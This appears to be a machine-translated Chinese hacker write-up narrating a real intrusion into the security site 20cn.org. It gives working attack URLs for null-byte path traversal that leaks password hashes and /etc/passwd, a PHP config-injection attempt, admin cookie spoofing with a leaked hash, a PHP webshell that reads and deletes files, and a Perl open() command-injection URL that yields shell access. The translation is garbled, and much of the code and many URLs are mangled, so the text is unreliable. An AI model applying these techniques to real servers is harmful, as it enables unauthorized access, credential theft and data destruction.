| = ------- reproduce goodwill invading 20cn.org whole process ------- = |
| = --------- = [pskey & envymask] = --------- = |
| = --------------------------------------- = |
Author: Envymask <130@21cn.com>
Site:
http://envymask.3322.org
Phantom brigade:
http://www.ph4nt0m.net/bbs/
Author: [C4ST] PsKey
Site:
http://www.isgrey.com
Group Home:
http://c4st.51.net
Group Forum:
Http://analysisist.tocare.net
>>> Dedicated this scrap to caojing & taozi <<<<
Among the martial arts, the sword will take the forever to play the length. Today, the firewall is widely applied to the network to perform an access control policy. In the past, the CGI safe quietly raised, and the shape of the script attack is in the "identity" of the firewall. It seems that simple scripts are essentially hidden. This article real reappears with script defects, the whole process of invading 20CN, trying to get a little fun and revelation.
20cn.org (20CN Network Security Group) is a more well-known hacker / security site in China, and we started a safety test of her.
Without any helves, we will get started from the web directly. It is understood that the 20CN finite program is written by the station master NetDemon. Based on code size and complexity considerations, we focus on the website forum. We are accustomed to see user information, because the username and user password are always keeping it together, here we are more likely to approach our cravings. Submit the following URL to view NetDemon user information:
http://www.20cn.org/cgi-bin/club/scripts/userinfo.pl?User=netDemon
Normal return user information
http://www.20cn.org/cgi-bin/club/scripts/userinfo.pl?user=./netdemon
Error Tip: There is a problem in the forum system!
http://www.20cn.org/cgi-bin/club/scripts/userinfo.pl?User=netDemon�000000
The "number of posts" returned to the user information appeared a inexplicable string, and the other part of the information is also full.
It seems a little problem here, what is this string? After we go to the ID of the previous application, we see that there is a variable named Key after the query_string of each URL, and its value is similar to the above strings. Is this a password? After we landed several times, we observed that this key value was different. It seems that this key is used to identify our identity in the forum, should be related to the user's password ... or no matter this key value, Continue to do experiments with our ID, submit this URL
http://www.20cn.org/cgi-bin/club/scripts/userinfo.pl?user=envymask�
Out of the previously similar string, this time we boldly guess this string is our password, by verifying, we find that this is indeed a string that we pass the standard DES encryption. This proves that our guess is correct, this string is an encrypted user password. But why will the password slipped out? So we will then speculate: There must be two files that save each user information in the user data directory, and one inside is saved, and the other is not, only some general information, such as the mailbox, birthday. These two files should be one UserName, the other is username.xxx (add a suffix). UserInfo.pl This program does not filter the user with the Open function to filter us, at least without filtering / 0, which makes it in substantially open UserName.xxx when trying to open the username.xxx file, but UserName.xxx is not UserName. The code that opens the file may be the Open (f, "$ PATH / $ UserName.xxx" written); so when the user = Abcdef% 00 is equivalent to Open (f, "$ Path / Abcdef"); and this file It is the file that saves the user password, so some user information variables are incorrectly valued in the file, and then feedback to the user, so the password is coming out. Coozy ... we immediately found the password of the webmaster NetDemon, and the thoughts of violent cracks were over, we watched and further break through this directory, so submit http://www.20cn.org/cgi-bin/ Club / scripts / usrinfo.pl? user = .. / .. / .. / .. / .. / .. /. / etc / passwd% 00
The password file is coming out, it seems that there is a head, continue
http://www.20cn.org/cgi-bin/club/scripts/userinfo.pl?user=../../../..../../../etc/�
Limited by page output format, we can only check some files and directories in the / etc directory; then try to open some files, but only some small fragments of the file, almost useless, have viewed a lot of files After that, there is no new breakthrough, we are a bit disappointed. So we temporarily put this bug aside to see if there is any other file defect, continue to find some CGI programs such as display.pl, show.pl, etc., there is no place to break through, because these documents have done some Filtering, it seems that this road will not go.
Since CGI does not break through, only another way of thinking. We look at the userinfo.pl to check some of the fragment files and directories, first search for Apache's profile, and finally find httpd.conf in the / usr / local / etc / apache directory, but only to view a few lines of the file. These are not used at all. I came to the / home directory and looked at it. Well, there are many users, more users who have previously viewed / etc / passwd, because when viewing / etc / passwd, I can only see a few lines, just enter a user Tomy's directory, 咦, see the directory / public_html, it seems that the system may assign each user to the space for publishing the personal home page, interesting, seeing in the browser can access to
http://www.20cn.org/~tomy
Oh, see this guy's personal page, then look at things inside, then we accidentally saw a / phpmyadmin directory, immediately visited, and found that there is no password verification. Now we are equivalent to getting a MySQL user, we tried to write something in the database via phpMyadmin, the content is a small phpshell, then exported to the home page, busy for a long time, finally write in, but on the hard disk When I wrote, I found no permissions, a depressed attack ... Continue to view several users' directory, most of which have more things, only some static pages. After some efforts, we finally found a big head - Shuaishuai (Shuai) this user, go to the home page of him to see, ha, discover this
Http://www.20cn.org/~shuaishuai/show.php?filenaMe=20030329185337.txt
Good guy, see if you can jump catalog
http://www.20cn.org/~shuaishuai/show.php?filename=../../....../../../etc/passwd
Return to these things to us
Warning: IS_FILE () [Function.is-file]: Safe Mode Restriction In Effect. The Script Whose Uid IS 1007 IS Not ALOWED to Access ././../../../../../../../../../ ../etc/passwd oowned by uid 0 in /usr/Home/shuaishua/public_html/show.php on line 77
Failure, but not not jumping, just no permissions. Well, let's try to see if you can see a document with permissions.
http://www.20cn.org/~shuaishuai/show.php?filename=../....../../../../../Home/shuaishuai/public_html/post.php
Oh, success, I saw the source code of Post.php This file is great, we will make this as a breakthrough. But this can only view Shuaishuai's files, can not view other files, but only to view files seems not enough, we hope to get a shell, which seems to be more difficult. Still look at the other, in fact, Shuaishuai's homepage is quite a lot, and a message board is X-Pad. This message board allows the user to register, each registered user has a configuration below / user directory File, keep some information from the user, after viewing the registration file source code we found that it is not filtered, at least one variable can enable us to insert our code. So we applied for a user inserted our code in the HOMEPAGE field, so that our user profile looks like this:
$ User_psw = "1234";
$ USER_QQ = "";
$ User_Email = ""
$ User_homepage = "http: ///"; COPY ($ A, $ B); Unlink ($ a); # ";
$ User_avatar = "styles / avatars / blank.gif";
$ User_bbsmode = "0";
?>
The above PHP file allows us to upload files to the specified directory and delete the file with permissions delete. But in the execution process, it is not possible, why? It didn't look at $ user_homepage = "http: ///"; COPY ($ A, $ B); Unlink ($ a); # ";
In this line we submit "(quotes), before, it is automatically inserted / so that it is not a double quotation number (") in the PHP statement ("), but the variable ("). Ie $ user_homepage variable value is "http: // / "; COPY ($ a, $ b); unlink ($ a); #" The entire string does not play a role. It seems that Magic_quotes_GPC = ON, then the report failed.
No discouragement, we will continue to look patiently to find things that can be used, and we discovered it immediately.
Http://www.20cn.org/~ Shuaishuai/down_sys/ So download system. View the directory and view the source file of the download system (because we have permission to view the file in this directory), in Down_Sys / Data / USER / The administrator's user file is found below, which contains a password, but headache is that the administrator password is encrypted by MD5. At this time we didn't easily give up this encrypted password. We immediately viewed the code of administrator verification. In /down_sys/admin/global.php This file found that its verification mode contains cookie verification, the relevant code is as follows:
......
IF (Isset) $ password = md5 ($ Password);
IF (Empty ($ username) $ usrname = $ http_cookie_vars ['bymid'];
IF (Empty ($ Password) $ Password = $ http_cookie_vars ['bympwwd'];
IF (! CHECKPASS ($ UserName, $ Password) {
Admintitle ();
Adminlogin ();
EXIT;
}
......
You can make a cookie spoofing. We use it here a more cumbersome way:
First disconize the network, change our IP to 20cn.org IP, then in% systemroot% / system32 / drivers / etc / hosts file
Www.20cn.org This domain name points to the IP of 20cn.org, do this step is to succeed in the way when we disconnect the network.
Www.20cn.org parsing into its IP. Finally, in our IIS, you have built a virtual directory / ~ shuaishuai / down_sys / admin / write an ASP file, set the cookie to the administrator's username and the secret code, The ASP file content is as follows:
<%
Response.cookies ("Bymid") = "adminuser"
Response.cookies ("bympwd") = "596a96cc7bf91abcd896f33c44aedc8a"
%>
Then access this ASP file
http://www.20cn.org/~shuaishuai/down_sys/admin/cookie.asp
Leave this window, change the IP back to the original 192.168.0.1, then use this window request
Http://www.20cn.org/~shuaishuai/down_sys/admin/admin.php
The management interface came out, passed the verification. Then we will upload the document ... You can get our things for a long time, there is no function of uploading the file, fiant, is a complete semi-finished product, completely disappointed? No, we still have confidence, then check out other files, see if you can move your hands and feet, we found a class.php, save some software classification information for the download system, the content looks like this : 5 | Security Tools | 1028372222
8 | Wine Tools | 1034038173
7 | Other Software | 1034202097
....
We tried to write something inside, so I added a new master classification in the management page, the name of the classification is "
5 | Security Tools | 1028372222
8 | Wine Tools | 1034038173
7 | Other Software | 1034202097
9 | | 1054035604
This PHP file allows us to upload files to have permission directory and delete files with permissions. So we wrote a form locally and uploaded a phpshell and then accessed.
Http://www.20cn.org/~shuaishuai/down_sys/data/sh.php
GOOD, returned to PHPSHELL interface ... After a happy, we found that this phpshell can not be executed. The original website PHP opens the SAFE_MODE function, restrict us to execute the command. But we have a big breakthrough, you can upload files to the server. Next, we have written a lot of small scripts on the test. Programs to view some directory and files viewed by privileges:
$ C = $ http_get_vars ["c"];
$ f = $ http_get_vars ["f"];
IF ($ c == "file") {
$ file = readfile ($ f);
Echo $ FILE;
}
IF ($ C == "DIR") {
$ h = opendir ($ f);
While ($ file = readdir ($ h)) {
Echo "$ file / n";
}
}
IF ($ c == "DEL") {
Unlink ($ f);
}
?>
After doing a lot of attempts, we found that you can't get a new breakthrough on PHP, so we can use the PHP program above.
Www.20cn.org/cgi-bin/club/scripts/ directory The complete code of the program script, so we decided to return to the starting point, see the CGI file, because there is no authority to write files in the directory of the executable CGI program, The new CGI program is not realistic, so I decided to use the existing .pl program to insert the command, the target is naturally put on the Open function of Perl, so we start looking for Open functions, but find A lot of. PL files have not found it, but they see a lot of readfile () functions, remember that Perl has no such function, but here is a lot of readfile (), why? This is definitely a function they have already defined. We have a use club in front of each .pl file; there is a module here, so there is a module here, so you will find the Open function. Sub readkey {
MY ($ file) = @ _;
Unless (Open (fH, "$ file")) {
Errmsg ("Sorry! You are time to time, please re-landing ");
EXIT;
}
Unless (FH, LOCK_SH) {
Errmsg ("Can't Lock File: $ File");
}
MY $ DATA =
Close (fH);
Return $ DATA;
}
This is the custom Readfile function, confirmed our conjecture, and found a Meet function that meets the requirements, then searched which file calls this function, so quickly we found this function call in change_pw.pl. This program uses to modify the user's password, unfortunately, the code is called the readkey () function before determining whether the user's old password is correct:
MY $ key_info = readkey ("$ key_dir / $ key");
So
http://www.20cn.org/cgi-bin/club/scripts/change_pw.pl?passwd0=1&asswd1=22&passwd2=222222&prasswd2=22222222222225 /../ bin / ls% 20> BBB% 20 |
View more
http://www.20cn.org/cgi-bin/club/scripts/bbb
Yeah! Successfully implemented ... There is a result of our expectations, which is really wonderful, you can use this to execute the command, it is equivalent to getting a shell. But after all, it is inconvenient, can't view our running results in time. So we uploaded a file, compiled, executed, then
D: / Temp> NC -VV
Www.20cn.org 12345
Www.20cn.org [211.161.57.29] 12345 (?) Open
id
UID = 80 (WWW) GID = 80 (WWW) Groups = 80 (WWW)
Uname -a
FreeBSD ns8.20cn.com 4.8-release freebsd 4.8-release # 1: WED APR 2 07:01:40 CST 2003 root@ns8.20cn.com: / usr / obj / usr / src / sys / 20cn i386
Oh, it is FreeBSD 4.8-Release, the version is very high, and the improvement permissions are more difficult. We haven't found a valid Local Exploit for a long time, and the improved permissions failed. Here, our hacking is basically ended. Although I didn't get ROOT, I got at least the website web privilege. For our CGI security enthusiasts, it should be completed in your own work -). After that, we quickly contacted the station, reminding him of the security risks, but the standing master did not ask us, he repaired the vulnerability by analyzing the log.
